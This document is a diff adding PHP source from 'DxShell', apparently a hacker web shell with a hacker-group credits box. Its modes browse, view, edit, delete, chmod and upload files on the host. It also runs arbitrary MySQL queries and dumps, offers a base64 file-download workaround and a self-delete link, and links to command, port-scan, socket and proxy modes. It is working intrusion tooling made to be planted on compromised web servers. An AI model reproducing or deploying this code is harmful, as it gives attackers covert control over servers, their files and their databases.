+print "\n\n".'<span align=right style="position:absolute;z-index:1;right:0pt;top:0pt;"><table><tr><td class="h2_oneline"><nobr>';
+if ((strlen($GLOB['SHELL']['USER']['Login'])+strlen($GLOB['SHELL']['USER']['Passw']))>=2)
+	print "\n".'<a href="'.DxURL('kill', 'dxinstant').'&dxinstant=logoff" title="Log Off" class=no>[Exit]</a>';
+print "\n".'<a href="'.DxURL('kill', 'dxinstant').'&dxinstant=DEL" title="Delete self ('.basename($_SERVER['PHP_SELF']).')" class=no><font color=#FF0000;>'.DxImg('del').'</font></a>';
+print "\n".'</nobr></td></tr></table></span>';
+
+print "\n\n".'<hr>';
+print "\n".'Disk free: <b>'.DxStr_FmtFileSize(disk_free_space($GLOB['FILES']['CurDIR'])).' / '.DxStr_FmtFileSize(disk_total_space($GLOB['FILES']['CurDIR'])).'</b> ; ';
+print "\n".'OS: <b>'.$GLOB['SYS']['OS']['id'].' ('.$GLOB['SYS']['OS']['Full'].' )</b> ; ';
+print "\n".'Yer_IP: <b>'.@$_SERVER['REMOTE_ADDR'].' ('.@$_SERVER['REMOTE_HOST'].')</b> ; ';
+print "\n".'<nobr>Own/U/G/Pid/Inode:<wbr><b>'.get_current_user().' / '.getmyuid().' / '.getmygid().' / '.getmypid().' / '.getmyinode().'</b> ; </nobr>';
+print "\n".'MySQL : <b>'.@mysql_get_server_info().'</b> ; ';
+print "\n".'<br>'.@$_SERVER['SERVER_SOFTWARE'];
+?>
+	</td>
+</table>
+<table width=100% cellspacing=0 cellpadding=0 class=outset>
+<tr>
+	<td width=100pt class=h2_oneline><h2>Modes</td>
+	<td style="text-align:center;"><nobr>
+	<a href="<?=DxURL('kill', '');?>&dxmode=DIR">DIR</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=F_VIEW">VIEW</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=FTP<?=((!empty($_GET['dxdir']))?'&dxdir='.$_GET['dxdir']:'');?>">FTP</a>
+	<td><font class=highlight_txt><big><b>II</td><td style="text-align:center;"><nobr>
+	<a href="<?=DxURL('leave', 'dxsql_s,dxsql_l,dxsql_p,dxsql_d');?>&dxmode=SQL">SQL</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=PHP">PHP</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=COOK">COOKIE</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=CMD">CMD</a>
+	<td><font class=highlight_txt><big><b>II</td><td style="text-align:center;"><nobr>
+	<a href="<?=DxURL('kill', '');?>&dxmode=MAIL">MAIL</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=STR">STR</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=PRT">PORTSCAN</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=SOCK">SOCK</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=PROX">PROXY</a>
+	</td>
+	</tr>
+</table>
+
+<?php $DX_Header_drawn=true; ?>
+
+<?php
+#################################################
+########
+########   DXGLOBALSHIT DOWNLOADER
+########
+if (isset($DxDOWNLOAD_File)) /* only when DXGLOBALSHIT is enabled */
+	{	print "\n".'<table align=center><tr><td class=mode_header><b>Download file</td></tr></table>';
+	print "\n".'The fact you see this means that "'.basename($_SERVER['PHP_SELF']).'" has fucked up the output with it\'s shit, so no headerz could be sent =((';
+	print "\n".'<br>Exclusively, DxShell is proud to present an additional way to download files...Just execute the php-script given below, and it will make the file u\'re trying to download';
+
+	if ($GLOB['SYS']['GZIP']['CanUse'])  $DxDOWNLOAD_File['content']=gzcompress($DxDOWNLOAD_File['content'], 6);
+
+	print "\n\n".'<br><br>';
+	print "\n".'<textarea rows=30 style="width:90%" align=center>';
+	print "\n".'<?php'."\n".' //Execute this, and you\'ll get the requested "'.$DxDOWNLOAD_File['filename'].'" in the same folder with the script ;)';
+	print "\n".'// The file is '.(  ($GLOB['SYS']['GZIP']['CanUse'])?'gzcompress()ed and':''  ).' base64_encode()ed';
+	print "\n\n".'$encoded_file=\''.base64_encode($DxDOWNLOAD_File['content']).'\';';
+	print "\n\n\n\n";
+	print "\n".'$f=fopen(\''.$DxDOWNLOAD_File['filename'].'\', \'w\');';
+	print "\n".'fputs($f, '.(  ($GLOB['SYS']['GZIP']['CanUse'])?'gzuncompress(base64_decode($encoded_file))':'base64_decode($encoded_file)'  ).');';
+	print "\n".'fclose($f);';
+	print "\n".'//Yahoo, hacker, the file is here =)';
+	print "\n".'?>';
+	print "\n".'</textarea>';
+	die();
+	}
+
+?>
+
+<table align=center>
+	<tr><td class=mode_header>
+	@MODE: <b><?=$GLOB['DxMODES'][$_GET['dxmode']];?>
+	</td></tr></table>
+<?
+
+########
+########   AboutBox
+########
+if ($_GET['dxmode']=='WTF')
+	{
+	?>
+<table align=center class=nooooneblya><tr><td><div align=center>
+<?php
+print '<a href="http://hellknights.void.ru/">'.DxImg('exec').'</a>';
+print '<br>o_O Tync, ICQ# 244-648';
+?><br><br>
+<textarea name="LolBox" class=bout style="width:500pt; height:500pt;"></textarea></table>
+<SCRIPT language=Javascript><!--
+var tl=new Array(
+"Kilobytes of c0de, litres of beer, kilometers of cigarettes (*no drugs*), and for what purpose?",
+"What's wrong with other shells?",
+"Usability, functionality, bugs?... NO.",
+"The main bug is: these shells ARE NOT mine =)",
+"Just like to be responsible for every motherfucking byte of code.",
+"Enjoy!",
+"-----------------------------------",
+"o_O Tync, http://hellknights.void.ru/, ICQ#244648",
+"DxShell v<?=$GLOB['SHELL']['Ver'].', date '.$GLOB['SHELL']['Date'];?>",
+"",
+"Greetz to: ",
+"iNfantry the Ruler",
+"Nik8 the Hekker",
+"_1nf3ct0r_ the Father",
+"Industry of Death the betatest0r =)",
+"",
+"Thanks to:",
+"Dunhill the cigarettes, Tuborg the beer, PHP the language, Nescafe the Coffee, Psychedelic the Music",
+"",
+"Wartime testers & debuggers ::: =))) :::",
+"MINDGROW",
+"",
+"",
+"Hekk da pl0net!",
+"--- EOF ---"
+);
+var speed=40;var index=0; text_pos=0;var str_length=tl[0].length;var contents, row;
+function type_text()
+{contents='';row=Math.max(0,index-50);
+while(row<index) contents += tl[row++] + '\r\n';
+document.getElementById("LolBox").value = contents + tl[index].substring(0,text_pos)+'|';
+if(text_pos++==str_length)
+	{text_pos=0;index++;
+	if(index!=tl.length)
+	{str_length=tl[index].length;setTimeout("type_text()",1000);
+	}
+	} else setTimeout("type_text()",speed);
+}type_text();
+//-->
+</SCRIPT>
+	<?php
+	}
+
+
+		###################################
+
+########
+########   Upload file
+########
+if ($_GET['dxmode']=='UPL')
+	{
+	if (empty($_POST['dxdir']) AND empty($_GET['dxdir'])) die(DxError('Uploading without selecting directory $_POST/$_GET[\'dxdir\'] is restricted'));
+
+	if (isset($_FILES['dx_uplfile']['tmp_name']))
+		{
+		$GETFILE=file_get_contents($_FILES['dx_uplfile']['tmp_name']);
+		DxFiles_UploadHere($_POST['DxFTP_FileTO'], $_FILES['dx_uplfile']['name'], $GETFILE);
+		}
+		else
+		{
+		print "\n".'<form action="'.DxURL('leave','dxmode,dxsimple').'" enctype="multipart/form-data" method=POST>';
+		print "\n".'<input type="hidden" name="MAX_FILE_SIZE" value="'.$GLOB['PHP']['upload_max_filesize'].'">';
+		print "\n".'<font class="highlight_txt">Max: '.DxStr_FmtFileSize($GLOB['PHP']['upload_max_filesize']).'</font>';
+		print "\n".'<br><input type=text name="dxdir" value="'.$_GET['dxdir'].'" SIZE=50>';
+		print "\n".'<br><input type=file name="dx_uplfile" SIZE=50>';
+		print "\n".'<input type=submit value="Upload" class="submit"></form>';
+		}
+	}
+
+		###################################
+
+########
+########   Directory listings
+########
+if ($_GET['dxmode']=='DIR')
+	{
+	if (empty($_GET['dxdir'])) $_GET['dxdir']=realpath($GLOB['FILES']['CurDIR']);
+	$_GET['dxdir']=DxFileOkaySlashes($_GET['dxdir']);
+	if (substr($_GET['dxdir'], -1,1)!='/') $_GET['dxdir'].='/';
+
+	print "\n".'<br><form action="'.DxURL('kill', '').'" method=GET style="display:inline;">';
+	DxGETinForm('leave', 'dxmode');
+	print "\n".'<input type=text name="dxdir" value="'.DxFileOkaySlashes(realpath($_GET['dxdir'])).'" SIZE=40>';
+	print "\n".'<input type=submit value="Goto" class="submit"></form>';
+
+	print "\n".'<br>'.'<b>&gt;&gt; <b>'.$_GET['dxdir'].'</b>';
+	if (!file_exists($_GET['dxdir'])) die(DxError('No such directory'));
+	if (!is_dir($_GET['dxdir'])) 	  die(DxError('It\'s a file!! What do you think about listing files in a file? =)) '));
+
+	if (isset($_GET['dxparam']))
+		{		if ($_GET['dxparam']=='mkDIR')  if (	!mkdir($_GET['dxdir'].'__DxS_NEWDIR__'.DxRandomChars(3))	) DxError('Unable to mkDir. Perms?');
+		if ($_GET['dxparam']=='mkFILE') if (	!touch($_GET['dxdir'].'__DxS_NEWDIR__'.DxRandomChars(3))	) DxError('Unable to mkFile. Perms?');
+		}
+
+	if (!($dir_ptr=opendir($_GET['dxdir']))) die(DxError('Unable to open dir for reading. Perms?...'));
+	$FILES=array('DIRS' => array(), 'FILES' => array());
+	while (!is_bool( $file = readdir($dir_ptr)  ) )
+		if (($file!='.') and ($file!='..'))		if (is_dir($_GET['dxdir'].$file)) $FILES['DIRS'][]=$file; else $FILES['FILES'][]=$file;
+	asort($FILES['DIRS']);asort($FILES['FILES']);
+
+	print "\n".'<span style="position:absolute;right:0pt;">';
+	if (isset($_GET['dxdirsimple']))	print '<a href="'.DxURL('kill', 'dxdirsimple').'">[Switch to FULL]</a>';
+		else					print '<a href="'.DxURL('leave', '').'&dxdirsimple=1">[Switch to LITE]</a>';
+	print '</span>';
+
+	$folderup_link=explode('/',$_GET['dxdir'].'../');
+	if (!empty($folderup_link[   count($folderup_link)-3   ]) AND ($folderup_link[   count($folderup_link)-3   ]!='..'))
+		unset($folderup_link[   count($folderup_link)-3   ], $folderup_link[   count($folderup_link)-1   ]);
+	$folderup_link=implode('/', $folderup_link);
+	print "\n".str_repeat('&nbsp;',3).'<a href="'.DxURL('leave', 'dxdirsimple').'&dxmode=DIR&dxdir='.$folderup_link.'" class=no>'
+						.DxImg('foldup').' ../</a>';
+
+	print "\n".str_repeat('&nbsp;', 15).'<font class=highlight_txt>MAKE: </font>'
+		.'<a href="'.DxURL('leave', 'dxmode,dxdir,dxdirsimple').'&dxparam=mkDIR">Dir</a>'
+		.' / '
+		.'<a href="'.DxURL('leave', 'dxmode,dxdir,dxdirsimple').'&dxparam=mkFILE">File</a>'
+		.' / '.str_repeat('&nbsp;',5)
+		.'<font class=highlight_txt>UPLOAD: </font>'
+		.'<a href="'.DxURL('leave', 'dxdirsimple').'&dxdir='.DxFileToUrl($_GET['dxdir']).'&dxmode=UPL">Form</a>'
+		.' / '
+		.'<a href="'.DxURL('leave', 'dxdirsimple').'&dxdir='.DxFileToUrl($_GET['dxdir']).'&dxmode=UPL">FTP</a>'
+		;
+
+	print "\n".'<br>'.count($FILES['DIRS']).' dirs, '.count($FILES['FILES']).' files ';
+	print "\n".'<table border=0 cellspacing=0 cellpadding=0 ><COL span=15 class="linelisting">';
+	for ($NOWi=0;$NOWi<=1;$NOWi++)
+		for ($NOW=($NOWi==0)?'DIRS':'FILES', $i=0;$i<count($FILES[$NOW]);$i++)
+			{			$cur=&$FILES[$NOW][$i];
+			$dircur=$_GET['dxdir'].$cur;
+			print "\n".'<tr>';
+			print "\n\t".'<td class=linelisting '.((isset($_GET['dxdirsimple']) AND ($NOW=='DIRS'))?'colspan=2':'').'>'
+							.(($NOW=='DIRS')?DxImg('folder').' '
+							.				 '<a href="'.DxURL('leave', 'dxdirsimple').'&dxmode=DIR&dxdir='.DxFileToUrl($dircur).'" class=no>':'')
+							.(($NOW=='FILES')?'<a href="'.DxURL('kill', '').'&dxmode=F_VIEW&dxfile='.DxFileToUrl($dircur).'" class=no>':'')
+							.htmlspecialchars($cur).'</td>';
+
+			if (!isset($_GET['dxdirsimple']))
+				{
+				print "\n\t".'<td class=linelisting>'
+					.'<span '.DxDesign_DrawBubbleBox('File Info',    '<b>Create time:</b><br>'.DxDate(@filectime($dircur)).'<br>'
+															 		.'<b>Modify time:</b><br>'. DxDate(@filemtime($dircur)).'<br>'
+															 		.'<b>Owner/Group:</b><br>'.(@fileowner($dircur)).' / '.(@filegroup($dircur))
+															 		, 150).' class=Hover><b>INFO</span> </td>';
+				print "\n\t".'<td class=linelisting '.(($NOW=='DIRS')?'colspan=2':'').'>'
+					.((($i+$NOWi)==0)?'<span '.DxDesign_DrawBubbleBox('Perms legend', '1st: sticky bit:<br>"<b>S</b>" Socket, "<b>L</b>" Symbolic Link, "<b>&lt;empty&gt;</b>" Regular, "<b>B</b>" Block special, "<b>D</b>" Directory, "<b>C</b>" Character special, "<b>P</b>" FIFO Pipe, "<b>?</b>" Unknown<br>Others: Owner/Group/World<br>"<b>r</b>" Read, "<b>w</b>" Write, "<b>x</b>" Execute<br><br><b>Click to CHMOD', 400).' class=Hover>':'')
+					.'<a href="'.DxURL('kill', '').'&dxmode=F_CHM&dxfile='.DxFileToUrl($dircur).'" class=no>'.DxChmod_Oct2Str(@fileperms($dircur)).'</td>';
+				}
+
+			if ($NOW!='DIRS') print "\n\t".'<td class=linelisting style="text-align:right;">'.DxStr_FmtFileSize(@filesize($dircur)).'</td>';
+
+			if (!isset($_GET['dxdirsimple']))
+				{
+				if ($NOW=='DIRS') print "\n\t".'<td class=linelisting colspan='.(($GLOB['SYS']['GZIP']['IMG'])?'4':'3').'>&nbsp;</td>';
+				if ($NOW!='DIRS') print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxparam=SRC&dxfile='.DxFileToUrl($dircur).'" target=_blank>'.DxImg('view').'</a></td>';
+				if ($NOW!='DIRS') print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_ED&dxfile='.DxFileToUrl($dircur).'">'.DxImg('ed').'</a></td>';
+				if ($NOW!='DIRS') print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxfile='.DxFileToUrl($dircur).'">'.DxImg('downl').'</a></td>';
+				if (($NOW!='DIRS') AND ($GLOB['SYS']['GZIP']['IMG'])) print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_DWN&dx_gzip=Yeah&dxfile='.DxFileToUrl($dircur).'">'.DxImg('gzip').'</a></td>';
+				print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_REN&dxfile='.DxFileToUrl($dircur).'">'.DxImg('rename').'</a></td>';
+				print "\n\t".'<td class=linelisting '.(($NOW=='DIRS')?'colspan=3':'').'><a href="'.DxURL('kill', '').'&dxmode=F_DEL&dxfile='.DxFileToUrl($dircur).'">'.DxImg('del').'</a></td>';
+				if ($NOW!='DIRS') print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_COP&dxfile='.DxFileToUrl($dircur).'">'.DxImg('copy').'</a></td>';
+				if ($NOW!='DIRS') print "\n\t".'<td class=linelisting><a href="'.DxURL('kill', '').'&dxmode=F_MOV&dxfile='.DxFileToUrl($dircur).'">'.DxImg('move').'</a></td>';
+				}
+			print "\n\t".'</tr>';
+			}
+	print "\n".'</table>';
+	}
+
+
+########
+########   File Global Actions
+########
+if ('F_'==substr($_GET['dxmode'],0,2))
+	{	if (empty($_GET['dxfile']))
+		{		print "\n".'<form action="'.DxURL('kill', '').'" method=GET>';
+		DxGETinForm('leave', '');
+		print "\n".'<input type=text name="dxfile" value="" style="width:70%;">';
+		print "\n".'<br><input type=submit value="Select" class="submit">';
+		print "\n".'</form>';
+		}
+	if (!file_exists(@$_GET['dxfile']))  die(DxError('No such file'));
+	print "\n\n".'<a href="'.DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_GET['dxfile'])).'">[Go DIR]</a>';
+	}
+
+########
+########   File CHMOD
+########
+if ($_GET['dxmode']=='F_CHM')
+	{
+	if (isset($_GET['dxparam']))
+		{		if (chmod($_GET['dxfile'], octdec((int)$_GET['dxparam']))==FALSE)
+			print DxError('Chmod "'.$_GET['dxfile'].'" failed');
+			else print 'CHMOD( <font class=highlight_txt>'.$_GET['dxfile'].'</b></font> )...<b>OK</b>';
+		}
+		else
+		{		print "\n".'<form action="'.DxURL('kill', '').'" method=GET>';
+		DxGETinForm('leave', 'dxmode,dxfile');
+		print "\n".'CHMOD( <font class=highlight_txt>'.$_GET['dxfile'].'</font> )';
+		print "\n".'<br><input type=text name="dxparam" value="'.
+			//decoct(fileperms($_GET['dxfile']))
+			substr(sprintf('%o', fileperms($_GET['dxfile'])), -4)
+			.'">';
+		print "\n".'<input type=submit value="chmod" class="submit"></form>';
+		}
+	}
+
+########
+########   File View
+########
+if ($_GET['dxmode']=='F_VIEW')
+	{
+	if (!is_file($_GET['dxfile']))  	die(DxError('Hey! Find out how to read a directory in notepad, and u can call me "Lame" =) '));
+	if (!is_readable($_GET['dxfile']))  die(DxError('File is not readable. Perms?...'));
+
+	print "\n".'<table border=0 cellspacing=0 cellpadding=0 align=right><tr>';
+	print "\n".'<td><h3>'.$_GET['dxfile'].'</h3></td>';
+	print "\n".'<td>'
+		.'<a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxparam=SRC&dxfile='.DxFileToUrl($_GET['dxfile']).'" target=_blank>'.DxImg('view').'</a>'
+		.'<a href="'.DxURL('kill', '').'&dxmode=F_ED&dxfile='.DxFileToUrl($_GET['dxfile']).'">'.DxImg('ed').'</a>'
+		.'<a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxfile='.DxFileToUrl($_GET['dxfile']).'">'.DxImg('downl').'</a>'
+		.'<a href="'.DxURL('kill', '').'&dxmode=F_DEL&dxfile='.DxFileToUrl($_GET['dxfile']).'">'.DxImg('del').'</a>'
+		.'</td>';
+	print "\n".'</tr></table><br>';
+	print "\n".'Tip: to view the file "as is" - open the page in <a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxparam=SRC&dxfile='.DxFileToUrl($_GET['dxfile']).'">source</a> (<i>works best in Opera</i>), or <a href="'.DxURL('kill', '').'&dxmode=F_DWN&dxfile='.DxFileToUrl($_GET['dxfile']).'">download</a> this file';
+
+	print "\n\n\n".'<br><hr><!-- File contents goes from here -->'."\n";
+	print "\n".'<plaintext>';
+	print file_get_contents($_GET['dxfile']);
+	die(); /* Plaintext is infinite */
+	}
+
+########
+########   File Edit
+########
+if ($_GET['dxmode']=='F_ED')
+	{
+	if (!is_file($_GET['dxfile']))  	die(DxError('Hey! Find out how to read a directory in notepad, and u can call me "Lame" =) '));
+	if (isset($_POST['dxparam']))
+		{		if (!is_writable($_GET['dxfile']))  die(DxError('File is not writable. Perms?...'));
+		if (($f=fopen($_GET['dxfile'], 'w'))===FALSE) die(DxError('File open for WRITE failed'));
+		if (fputs($f, $_POST['dxparam'])===FALSE)	die(DxError('I/O: File write failed'));
+		fclose($f);
+		print 'File saved OK;';
+		}
+		else
+		{
+		if (!is_readable($_GET['dxfile']))  die(DxError('File is not readable. Perms?...'));
+		if (!is_writable($_GET['dxfile'])) DxWarning('File is not writable!');		print "\n".'<font class=highlight_txt>'.$_GET['dxfile'].'</font>';
+		print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+		print "\n".'<textarea name="dxparam" rows=30 style="width:90%;">'.str_replace(array('<','>'),array('&lt;','&gt;'), file_get_contents($_GET['dxfile'])).'</textarea>';
+		print "\n".'<br><input type=submit value="Save" style="width:100pt;height:50pt;font-size:15pt;" class=submit>';
+		print "\n".'</form>';
+		}
+	}
+
+########
+########   File Delete
+########
+if ($_GET['dxmode']=='F_DEL')
+	{		if (isset($_GET['dx_ok']))
+			{		if ($_GET['dx_ok']=='Yes')
+			{			if (	(is_file($_GET['dxfile']) AND !unlink($_GET['dxfile']))  OR  (is_dir($_GET['dxfile']) AND !rmdir($_GET['dxfile']))		)
+				print DxError('Unable to delete file. Perms?...<br>');
+				else
+				{				print "\n".'Delete( <font class=highlight_txt>'.$_GET['dxfile'].'</font> ) <b>OK</b>';
+				DxGotoURL(DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_GET['dxfile'])));
+				}
+			}
+		}
+		else
+		{
+		if (!is_writable($_GET['dxfile'])) DxWarning('File is not writable!');		print "\n".'<form action="'.DxURL('kill', '').'" method=GET>';
+		DxGETinForm('leave', 'dxmode,dxfile');
+		print "\n".'<table border=0 cellspacing=0 cellpadding=0 align=center><tr><td>'
+					."\n".'<font class=achtung>(!)</font> Do you really want to <font class=highlight_txt>DELETE '.$_GET['dxfile'].'</font> ?'
+					."\n".'<div align=right><input type=submit name="dx_ok" value="No" class=bt_No><input type=submit name="dx_ok" value="Yes" class=bt_Yes>'
+					."\n".'</td></tr></table>';
+		print "\n".'</form>';
+		}
+	}
+
+########
+########   File Rename
+########
+if ($_GET['dxmode']=='F_REN')
+	{
+	if (isset($_POST['dxparam']))
+		{
+		if (!rename($_GET['dxfile'], dirname($_GET['dxfile']).'/'.$_POST['dxparam']))
+			print DxError('Unable to rename. Perms?...<br>');
+			else
+			{
+			print "\n".'Rename( <font class=highlight_txt>'.$_GET['dxfile'].'</font> -> <font class=highlight_txt>'.dirname($_GET['dxfile']).'/'.$_POST['dxparam'].'</font> ) <b>OK</b>';
+			DxGotoURL(DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_GET['dxfile'])));
+			}
+		}
+		else
+		{
+		print "\n".'<form action="'.DxURL('leave', 'dxmode,dxfile').'" method=POST>';
+		print "\n".'<input type=text name="dxparam" value="'.basename($_GET['dxfile']).'" style="width:80%">';
+		print "\n".'<input type=submit value="Rename" class="submit"></form>';
+		}
+	}
+
+########
+########   File Copy
+########
+if ($_GET['dxmode']=='F_COP')
+	{
+	if (!is_file($_GET['dxfile'])) die(DxError('Don\'t even think about copuing directories! =))'));
+
+	$newname=$_GET['dxfile'].'__DxS_COPY_'.DxRandomChars(3);
+	if (($extpos=strrpos($_GET['dxfile'], '.'))>strrpos($_GET['dxfile'], '/')) /* file has an extension */
+		$newname=substr($_GET['dxfile'], 0, $extpos).'__DxS_COPY_'.DxRandomChars(3).substr($_GET['dxfile'], $extpos);
+	print $newname;
+	if (!copy($_GET['dxfile'], $newname))
+		print DxError('Unable to copy. Perms?...<br>');
+		else
+		{
+		print "\n".'Copy( <font class=highlight_txt>'.$_GET['dxfile'].'</font> -> <font class=highlight_txt>'.$newname.'</font> ) <b>OK</b>';
+		DxGotoURL(DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_GET['dxfile'])));
+		}
+	}
+
+########
+########   File Move
+########
+if ($_GET['dxmode']=='F_MOV')
+	{
+	if (isset($_POST['dxparam']))
+		{
+		if (!rename($_GET['dxfile'], $_POST['dxparam']))
+			print DxError('Unable to rename. Perms? Or no path?...<br>');
+			else
+			{
+			print "\n".'Move( <font class=highlight_txt>'.$_GET['dxfile'].'</font> -> <font class=highlight_txt>'.$_POST['dxparam'].'</font> ) <b>OK</b>';
+			DxGotoURL(DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_POST['dxparam'])));
+			}
+		}
+		else
+		{
+		if (!is_writable($_GET['dxfile'])) DxWarning('File is not writable!');
+		print "\n".'<form action="'.DxURL('leave', 'dxmode,dxfile').'" method=POST>';
+		print "\n".'<input type=text name="dxparam" value="'.DxFileOkaySlashes(realpath($_GET['dxfile'])).'" style="width:80%">';
+		print "\n".'<input type=submit value="M0ve" class="submit"></form>';
+		}
+	}
+
+if (substr($_GET['dxmode'],0,2)=='F_')
+	{/* file actions */
+	print "\n\n".'<br><br>'.'<a href="'.DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($_GET['dxfile'])).'">[Go DIR]</a>';
+	}
+
+		###################################
+
+########
+########   SQL Maintenance
+########
+if ($_GET['dxmode']=='SQL')
+	{	if (!isset($_GET['dxsql_s'], $_GET['dxsql_l'], $_GET['dxsql_p']))
+		{		print "\n".'<h2>MySQL connection</h2>';
+		print "\n".'<form action="'.DxURL('kill', '').'" method=GET align=center>';
+		DxGETinForm('leave', 'dxmode');
+		print "\n".'<br>Serv: <input type=text name="dxsql_s" value="localhost" style="width:200pt">';
+		print "\n".'<br>Login:<input type=text name="dxsql_l" value="" 	 	style="width:200pt">';
+		print "\n".'<br>Passw:<input type=password name="dxsql_p" value="" 	style="width:200pt">';
+		print "\n".'<br><input type=submit value="C0nnect" class="submit" style="width:200pt;"></form>';
+		die();
+		}
+	if ((mysql_connect($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'])===FALSE) or (mysql_errno()!=0))
+		die(DxError('No connection to mysql server!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+		else print '&gt;&gt; MySQL connected!';
+
+	$mysqlver=mysql_fetch_row(mysql_query("SELECT VERSION()"));
+	print str_repeat('&nbsp;',15).'MySQL version: <font class="highlight_txt">'.$mysqlver[0].'</font>';
+
+	DxMySQL_FetchResult(DxMySQLQ('SHOW DATABASES;', true), $DATABASES, true);
+	for ($i=0;$i<count($DATABASES);$i++)
+		$DATABASES[$i][1]=mysql_num_rows(DxMySQLQ('SHOW TABLES FROM `'.$DATABASES[$i][0].'`;', false));
+
+	print "\n".'<table border=0 cellspacing=0 cellpadding=0>'
+				.'<tr><td class=h2_oneline><h1>DB:</h1></td>';
+	if (!isset($_GET['dxsql_d']))
+		{
+		print "\n".'<td class=h2_oneline style="border-width:0pt;">';
+		print "\n".'<form action="'.DxURL('kill', '').'" method=GET>';
+		DxGETinForm('leave', 'dxmode,dxsql_s,dxsql_l,dxsql_p');
+		print "\n".'<SELECT name="dxsql_d" onchange="this.form.submit()">';
+		print "\n\t".'<OPTION value="">&lt;Server&gt;</OPTION>';
+		for ($i=0;$i<count($DATABASES);$i++)
+		print "\n\t".'<OPTION value="'.$DATABASES[$i][0].'">'
+			.'['.DxZeroedNumber($DATABASES[$i][1],3).']'.' '.$DATABASES[$i][0]
+			.'</OPTION>';
+		print "\n".'</SELECT><input type=submit value="-&gt;" class=submit"></form></td>';
+		print "\n".'</tr></table>';
+		die();
+		}
+		else print "\n".'<td class=linelisting><font class=highlight_txt>'.((empty($_GET['dxsql_d']))?'&lt;Server&gt;':$_GET['dxsql_d']).'</font></td>'
+						.'<td class=linelisting><a href="'.DxURL('kill', 'dxsql_d').'" class=no>[CH]</a></td>'
+						.'<td class=linelisting><a href="'.DxURL('kill', 'dxmode').'&dxmode=SQLS" class=no>[Search in tables...]</a></td>'
+						.'<td class=linelisting><a href="'.DxURL('kill', 'dxmode').'&dxmode=SQLD" class=no>[Dump...]</a></td>'
+						.'</tr></table>';
+
+	if (!empty($_GET['dxsql_d']))
+		if (!mysql_select_db($_GET['dxsql_d']))
+			die(DxError('Can\'t select database!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+
+	print "\n".'<table border=0 cellspacing=0 cellpadding=0 width=100%>';
+	print "\n".'<tr><td width=1% class=h2_oneline style="vertical-align:top;">';
+	if (!empty($_GET['dxsql_d']))
+		{
+		print "\n\t".'<table  border=0 cellspacing=0 cellpadding=0>';
+		print "\n\t".'<caption>Tables:</caption>';
+		DxMySQL_FetchResult(DxMySQLQ('SHOW TABLES;', true), $TABLES, true);
+		for ($i=0;$i<count($TABLES);$i++) $TABLES[$i]=$TABLES[$i][0];
+		asort($TABLES);
+		for ($i=0;$i<count($TABLES);$i++)
+			{
+			DxMySQL_FetchResult(DxMySQLQ('SELECT COUNT(*) FROM `'.$TABLES[$i].'`;', true), $TRowCnt, true);			print "\n\t".'<tr><td class="listing"><nobr>'.(($TRowCnt[0][0]>0)?'&gt; ':'&nbsp;&nbsp;').$TABLES[$i].'</td></tr>';
+			}
+		print "\n\t".'</table>';
+		}
+	print "\n".'</td><td  width=100%>';
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'[?] Can run several querys if divided by ";"<br>If smth is wrong with charset, write first: SET NAMES cp1251;';
+	print "\n".'<textarea name="dxsql_q" rows=10 style="width:100%;">'.((empty($_POST['dxsql_q']))?'':$_POST['dxsql_q']).'</textarea>';
+	print "\n".'<div align=right>'
+				.'<input type=submit value="Query" class="submit"> '
+				.'<input type=submit name="dxparam" value="Download Query" class="submit"></div></form>'
+				.'<br>';
+
+	if (empty($_POST['dxsql_q'])) die('</td></tr></table>');
+	$_POST['dxsql_q']=explode(';', $_POST['dxsql_q']);
+
+	foreach ($_POST['dxsql_q'] as $CUR_Q)
+		{		if (empty($CUR_Q)) continue;
+		$CUR_Q.=';';
+
+		$num=DxMySQL_FetchResult(DxMySQLQ($CUR_Q, true), $FETCHED, false);
+		if ($num<=0) continue;
+
+		print "\n\n\n".'<table border=0 cellspacing=0 cellpadding=0><caption>'.$CUR_Q.'</caption>';
+
+		$INDEXES=array_keys($FETCHED[0]);
+		print "\n\t".'<tr><td class="listing" colspan='.(count($INDEXES)+1).'>&gt;&gt; Fetched: '.$num. str_repeat('&nbsp;', 10). 'Affected: '.mysql_affected_rows().'</td></tr>';
+		print "\n\t".'<tr><td class="listing"><div align=center  class="highlight_txt">###</td>';
+		foreach ($INDEXES as $key) print '<td class="listing"><div align=center class="highlight_txt">'.$key.'</td>';
+		print '</tr>';
+
+		for ($l=0;$l<count($FETCHED);$l++)
+			{
+			print "\n\t".'<tr><td class="listing" width=40><div align=right class="highlight_txt">'.$l.'</td>';
+			for ($i=0; $i<count($INDEXES); $i++)
+				print '<td class="listing"> '.DxDecorVar($FETCHED[$l][ $INDEXES[$i] ], true).'</td>';
+			}
+
+		print "\n".'</table><br>';
+		}
